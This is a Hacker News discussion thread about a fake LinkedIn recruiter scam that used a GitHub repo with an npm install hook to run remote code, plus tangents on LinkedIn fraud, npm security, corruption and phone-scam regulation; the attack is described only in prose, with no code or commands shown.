Smells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
I didn't read everything, but I had a DM offering a gig a few weeks ago, and asked me to check out a React site/app. I cloned it and it looked dubious; replied I pass.
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...
Good man, knows what he is doing.
FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. Its very fun workflow for experimentation. Still trying to work the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
LinkedIn is unusually resistant to enshitification; it started that way.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
> Friends don't let friends ise NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
I know you are joking, but there is something about this that I really don't get. "Friends" here really means "a professional network". Many nerds despise having one or maintaining/building one. At the same time, people pour weeks/months/years of their life into optimizing their modest investment portfolios. 0.01 percentage points of yearly cost differences of some passive ETF. That surely compounds. But you know what also compounds? Knowing somebody who knows somebody who has $skill or $job_posting. In a big way. Your work comp is still the biggest source of income for most, but investing into optimizing it by broadening your network is something people don't want to do. They'd rather discuss the tax implications of nuances of some investment portfolio.
I don't disagree, but broadening your network is a very different skill (being social) than handling investment portfolios. And for some of us, it's not that we necessarily despise creating or maintaining a network, it's that we suck at it.
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
They have some changes here in v12: https://github.blog/changelog/2026-06-09-upcoming-breaking-c...
And the discussion here, with 215 comments: https://news.ycombinator.com/item?id=48467705
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
People will not adopt a safer version if it broke their workflows. Adoption is part of preventing supply chain attacks.
They will if it's the only version. Eventually.
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being ran.
Bigger issue is giant, inscrutible dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
Claude Code regularly installs dependencies using (p)npm after I e.g. pull a company main branch to get in sync with my teammates. That happens often. So I pull, Claude edits some code as you requested and it should pass because Claude did alright, but your local box has out-of-date deps. So then Claude runs (p)npm i and now we have automatic exploitation of this gaping hole in npm given extremely common and current AI tooling. Someone has to figure out how to stop AI from running that command or NPM needs to stop that behavior, and I guarantee you it will be easier to get one tool to change than all AI.
The lockfile should protect you there. It'd only be an issue if you're working on updating dependencies in which case there's other protection like min-release-age
If pulling down your company repo and running `npm install` can lead to a compromise, something has went terribly wrong with your company's security setup.
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
LinkedIn didn't even disavow people pretending to work for LinkedIn until someone had too much fun with it - https://chrisduffycomedy.com/blog/2016/11/2/6-months-as-the-...
That’s funny, thanks for that.
What happened in the end?
Microsoft bought LinkedIn.
He got a huge package.
Everyone lived happily ever after.
(LinkedIn eventually locked and then deleted his account, https://awesomeatyourjob.com/1140-bringing-more-laughter-fun...)
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
I'm bottom of the ladder but have seeing the option to do it for at least a year.
If it’s an option and not required, then that doesn’t solve it.
Any clue what’s there "Persona" program that they are trying to push hard "so you can have so much positive leads"?
I have the same. The difference is, if you do email verification, you will "verified" status. If not, you can still add the company to your linkedin, just unverified, which is not a label.
You mean @fooco.com? Or @foocousa.com? Or @fooco.xyz? @fooco.ai? @foocoltd.net? @foo.co.uk?
How would LinkedIn validate that your email domain belongs to the company you claim to work for?
Presumably because the official company page is registered under it?
Not all companies use email addresses under the same domain as the "official company page" though.
With a company-managed list of owned domains where real employees have their work email addresses (unrelated to website domains).
And using DNS to prove that a domain is actually owned by this organization
Email domains of employee addresses aren't necessarily owned by the company. For example:
For security purposes, on the other hand, the important part is proving that the LinkedIn account is owned by the organization.
Then there are old school ISPs where there was no separation between company and customer email addresses.
What HelloNurse said, whoever it is that runs the company page on LinkedIn provides a list of domains that they consider theirs.
I had a LinkedIn account connected to my company email and one day I found myself locked out.
They want me to upload a govt id and blink my eyes in a video to get unlocked.
They can go jump.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily envolves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
Brazillian law, for instance, defines the crimes of passive and active corruption:
But, granted, revieweing US and UK law, it seems they don't define "corruption" as a crime (albeit some of the act names do mention corruption). So let's fallback onto the dictionary: [2]
Both definition a and c are too ample and, as you put it, "a smorgasbord". Definition b, specially when combined with a, describes something pretty specific: inducement of a powerful agent to wrong by improper or unlawful means, such as bribes.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange of personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
[0] https://en.wikipedia.org/wiki/Passive_corruption
[1] https://en.wikipedia.org/wiki/Active_corruption
[2] https://www.merriam-webster.com/dictionary/corruption
That is literally just a translation difference for bribery, a common issue for Brazilian Portuguese vs English.
[https://www.jusbrasil.com.br/topicos/10598684/artigo-317-do-...].
[https://www.britannica.com/topic/bribery]
> corruption necessarily envolves the government
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
[0] https://www.law.cornell.edu/wex/corruption
That sure is an interesting take from someone with "anarchist" in their username. IMHO corruption is any time you use power/influence/station in order to skew the normal well-behaved channels of governance (cybernetics) for personal gain. Any system with hierarchy can have corruption. Bernie Madoff was an example of illegal, private industry corruption.
I agree with you. I used to work for an ISP that sold kind-of overpriced 1Gbps connections and always wondered why customers bought it. Probably helping things was that we took them out to "events", floor seats at basketball, etc. The company just has a fixed expense, but the people making the decision get free stuff that makes them feel important, and it was kind of a way of transferring the company's money (by not buying the $29/month Internet connection) to themselves. I never felt good about it, but if you say that out loud, everyone will look at you like you're crazy.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
Vendor bribe swag is basically ubiquitous in the industrial world. When I worked in oil and gas it was quite common for a vendor to do a 'lunch and learn' where they bought the whole office very good lunch and we listened to them pitch whatever product line they wanted us to specify for design customers. I work in a more socially responsible but less lucrative industry now and alas no vendors buying me lunch
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
How does that not become a legal issue?
Who are we gonna sue? LinkedIn? I think my place of employment has better things to do than sue Microsoft.
> got it solved by buying drinks for a buddy of mine that works for LinkedIn
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
I know it is only a partial solution, but I saw with some companies that LinkedIn provides a way to verify a user works at such a company. This is done via sending an email to a company domain email address (supposedly yours that you provide), and then approving it from your work laptop. I guess the administrators of the company account on LinkedIn can determine which domains are allowed for this.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I’m in all the shittiest of spam lists for eternity. I don’t know how do they even harvest emails from Linkedin.
> I don’t know how do they even harvest emails from Linkedin.
https://haveibeenpwned.com/Breach/LinkedIn
this is from 2016. at time they had ~400 million users,and the breach is 164 million, Now it's close to 1.5 B. People these days use aggregators like Apollo, signal hire, apify. There are 1000s of such tools.
I had it several years ago when I was running my own one-man consultancy [ie: self-employed] ... somehow I'd managed to have six or seven people on LI claiming to work for the same company.
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
I wonder if a cease and desist to their legal department would work better?
<I wonder if a cease and desist to their legal department would work better?>
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometime makes you wonder if LinkedIn & the like are even worth it
Things like this where a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake costco website ad (cc harvester) to Google, their response was something along "we cannot verify the ad", go figure
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy cotton, let's see if it pays off.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
It’s been this bad for a little while, iirc have seen a few of these pop up over the last few years. And that’s just for the few someone’s caught/documented
I stay away anything that needs npm. I regularly scan for node-modules folders and rm -rf it.
> a recruiter at a small crypto startup
That's all you need to know they're criminals and frauds.
I've been freelancing for over a decade. This stuff is every third crypto related job. They're all malware repos running scripts the moment you turn on vscode hoovering up everything they can on your computer.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
while working at a Fortune 500 MNC, gig before this one, I used to get LinkedIn hits from recruiters.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
Job candidates keep facing a lot of hurdles, including scams, Trojan horses like the one presented here, ghosting, wasting candidates' time, nepotism, etc. As a candidate you can easily spend more than 8 hours a day looking for opportunities, switching stacks, studying, doing take-home projects, etc, for absolutely nothing. Life is precious and shouldn't be burned like that!
> Life is precious and shouldn't be burned like that
Very true. I remember when I was job hunting fot 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
It is absolutely the worst. Also the feeling that this task of job searching is supremely important. You feel guilty doing anything that isn’t job searching. Meeting friends? Spending money while you aren’t making any? Seems irresponsible internally. When your day fills with stuff that isn’t job searching it makes you feel that day was a failure. Even when you do job search and you have say a month without any bites, it also makes you feel that month was a failure. You feel like you are wasting your life. At least when you had a job, that time spent counted for a little more experience. Every second without a job feels like it counts against you. You feel like a leper. Look at me who failed to secure a job, I must be a failure, you think internally.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
yes this is a crime.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
https://www.fbi.gov/investigate/cyber
whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
> just ban U.S. platforms
Try that and see your champagne exports be tarriffed with 100% in no time.
china seems to be doing fine. what are you gonna do, tariff the country that makes all your stuff? 100% tariff on iphones and macbooks?
Won't that just create another channel for social engineering to delete a victim's account?
Sounds like socializing the harms instead of requiring these companies to bear the burden themselves. Could still be a valid approach but I'm afraid it will make them take less responsibility, not more.
> But that is far from the truth
Just install a Russian locale on your computer to prevent malicious programs even starting and get on with your day because it's the truth.
Snowden is a free man in 2026 despite the United States of America very much wanting to put him in jail.
Cut the cables
Something I've always wondered, because I'm a bit of a contrarian and I wonder if we're really any different: Could an American citizen hack and steal from Iranians and Russians with impunity from America? The issues that prevent the US from extraditing Russians who hack us -- don't they work both ways?
Legally speaking, no - it would still be a criminal offence.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a big of difference between targeted IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
What would happen if you honestly listed your earnings on your tax forms?
It would be very dependent on the exact circumstances - who made a complaint, what exactly they're accusing you of, what evidence there is, how high profile it is, the current diplomatic position (which changes by the hour), etc, etc. I don't think you can really get a simple answer for this kind of question.
As far as I know it has never happened. On the contrary, when Alejandro Caceres admitted to ddosing North Korea - taking down all their public websites for a week - he was questioned by the FBI who decided to take no further action.
https://www.wired.com/story/p4x-north-korea-internet-hacker-...
So hostile countries should be fair game for Americans who want a side-hustle. Plenty of Russian targets that could be profitable.
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
I don’t know but the us kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be aced upon…
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
> main issue is that we lack a global '911'
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
[1] https://www.sarsat.noaa.gov/emergency-406-beacons/
https://www.ic3.gov
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
> You won't hear back from them
You might. (I have.) They were able to get a wire sent to a fraudster reversed. (Not my wire.)
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Saw Microsoft has a dedicated scam reporting page - guess it was damaging their brand https://reportfraud.microsoft.com/en-us
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Yeah 100%. It's criminal that this is not already done.
>It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Wasn’t that sort of the premise of The Beekeeper?
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
I'm in the US, I have two 20-year old phone numbers and 1 cell number, none ring through with span or scams.
I wonder why that is? I dont give the numbers out. That's why. Whenever a store says "do you gave a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that dont tie prices to your having given them a number.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not a insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
The behavior of the phone network is set by government regulation. If you refuse to service allowable calls, you are heavily fined or kicked off the network. The government has to update the rules.
I'd be 100% happy to block those carriers from calling me. Their users should just get a message that calling my number is not supported and they should try calling me from another device.
Not allowed. The same government rules that stop Google from refusing calls from Apple devices also stop them from refusing calls from whoever is doing this. The government would have to update the rules. They could mandate number verification for all calls, even those passing over TDM trunks, and make it the network's problem to figure out how to do that. The rules currently say that all calls which don't pass through legacy equipment must have verified numbers, so there's a market for making calls take stupid legacy routes on purpose.
You are not wrong. They don't do this because they make money from the scammers.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
I always wondered why US cannot pressure India to crack down on those scammers? They use phone network, it should not be difficult to find them. Some youtubers even hack into their computers and extract all the info. US probably has a leverage here, they could simply ban Indian companies from working with US if they don't cooperate.
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
The scammers are in a different whole uncooperative country.
Or they may be in this country, but uses proxies, virtual machines, hostings from uncooperative country.
Less likely and when they are usually they're immigrants and if they're investigated they just go back home.
Cool let's hear your solution, you seem well versed on how infosec works.
Yes. But the perps are in North Korea.
There is but the FBI is horrible at responding to cybercrime. They have IC3 but its basically useless. They arent going to help or even contact you if you report a crime to them.
The amount of crime in the world -that requires arguably "low skill" time to resolve- that just gets filed away because of low resources is insane. How are forces going to stand up high skill task forces for these kinds of things?
In the Netherlands there's an official government agency that allows a simple mail or report: https://www.ncsc.nl/en/report-an-incident-to-ncsc-nl
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
Try calling 911 for a real world crime and see what it gets you.
The difference between pre- and post-chatbot writeups is stark: https://igor-blue.github.io/2021/03/24/apt1.html
$100 says OP is Claude
nice! i fell for it..
I don't want to be cynical, but maybe spending hours every day using Claude has made some of us particularly attuned to picking this up. For some reason as soon as I read "The trap was in app/test/index.js," I instantly knew it was Claude. It's too bad, because there will obviously be some false positives, but it makes me immediately disregard the author.
I sometimes use the Claude app with text to speech enabled. It’s got a quite distinctive voice/tempo combo when it’s outputting speech.
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
I think that comment is a little unfair, as the one you link to is a much more sophisticated attack. Thanks for the link, though. Great read!
This type of attack has been happening a lot the past 2 years. I've seen one that was very well done...the GitHub account of a fairly well known security researcher had been compromised...their identity and code was being used as part of the recruitement. I reached out to the person...who was understandably embarrassed and told me they had reported this to LinkedIn + Github but saw no action.
This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit be this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Call it a conspiracy theory, but I think a lot of these businesses actively avoid making serious efforts because even trying creates expectations. Ones that they don’t want to be on the hook for.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
They should have reported it for DMCA violation. It would be gone instantly.
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
I’ve seen this fake Carney garbage on YouTube. Money speaks louder than truth.
> they investigated and didn’t find any violation of their policies.
When my YT Premium elapsed 70% od ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were strait up foreign state-level propaganda, those I didn't even bother to report.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Keep in mind this is the company that makes Windows, a product so insecure they lost a lawsuit over it
Same story for me. I gave them the repo link and messages. Nothing 2 weeks later. Now I just block them and even then, you can't select a proper reason (there's no "other" field for a block), so I just say they're impersonating someone and leave it at that. We cannot let this become the primary site for job postings.
This is uncomfortably close to a normal interview task now.
